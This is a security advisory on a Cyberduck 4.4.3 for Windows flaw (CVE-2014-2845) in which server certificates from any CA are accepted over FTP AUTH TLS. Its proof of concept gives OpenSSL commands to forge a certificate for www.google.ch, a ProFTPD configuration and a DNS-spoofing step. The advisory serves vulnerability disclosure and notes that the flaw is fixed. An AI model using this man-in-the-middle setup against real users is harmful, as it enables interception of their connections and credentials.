Advisory ID: SYSS-2014-004
Product: Cyberduck
Affected Version(s): 4.4.3 (14140) (Windows only)
Not Affected Versions(s): 4.4.3 (14140) and 4.2.1 (9350) (both OS X 10.9.2)
Tested Version(s): 4.4.3 (Windows 7 32 bit and Windows 8.1 64 bit)
Vulnerability Type: X.509 validation
Risk Level: Medium
Solution Status: Fixed
Vendor Notification: 2014-04-08
Solution Date: 2014-04-10
Public Disclosure: 2014-05-06
CVE Reference: CVE-2014-2845
Author of Advisory: Micha Borrmann (SySS GmbH)

Overview:
Cyberduck (Windows versions only) accepts X.509 server certificate from any CA, also if they are not in the certificate store and not sent from the FTP server; only self-signed certificates are not accepted.

Vulnerability Details:
A user can not recognize an easy to perform man-in-the-middle attack, because the client does not validate the certificate chain of the servers X.509 certificate. In a networking environment that is not trustworthy, like a wifi network, using FTP AUTH TLS with Cyberduck the servers identity can not be trusted.

Proof of Concept (PoC): 
With OpenSSL generate a key for a CA and for the server and create the certificates:

openssl genrsa -out ca4096.key 4096
openssl genrsa -out 2048.key 2048
chmod 400 *.key
mkdir demoCA
mkdir demoCA/newcerts
touch demoCA/index.txt
echo ffaabb > demoCA/serial
openssl req -key ca4096.key -out ca4096.crt -new -x509 -subj "/C=DE/ST=BW/L=/O=SYSS/OU=/CN=CA" -days 3652
openssl req -key 2048.key -out 2048.csr -new -subj "/C=DE/ST=BW/L=/O=SYSS/OU=/CN=www.google.ch" -days 365
openssl ca -keyfile ca4096.key -cert ca4096.crt -in 2048.csr -out 2048.crt -days 365 

Put the key (2048.key) and the X.509 certificate (2048.crt) to a ProFTP server and modify the configuration

<IfModule mod_tls.c>
TLSEngine                               on
TLSLog                                  /var/log/proftpd/tls.log
TLSProtocol                             SSLv23
TLSRSACertificateFile                   /etc/ssl/2048.crt
TLSRSACertificateKeyFile                /etc/ssl/2048.key
TLSVerifyClient                         off
TLSRequired                             on
</IfModule>

Perform a DNS spoofing for www.google.ch and use Cyberduck to access this system with FTP-SSL (Explicit AUTH TLS).

Solution: Upgrade to Cyberduck 4.4.4

Disclosure Timeline:

April 08, 2014 - Vulnerability discovered
April 08, 2014 - Vulnerability reported to vendor
April 08, 2014 - First Vendor response
April 10, 2014 - Bug was confirmed and fixed by the vendor
April 10, 2014 - Bugfix could be confirmed with Cyberduck 4.4.4 (14478)
April 24, 2014 - Cyberduck 4.4.4 (14505) was released [1]

References:
[1] https://cyberduck.io/changelog/

Credits:
Security vulnerability found by Micha Borrmann of the SySS GmbH.

Disclaimer:
The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS web site.

Copyright:
Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en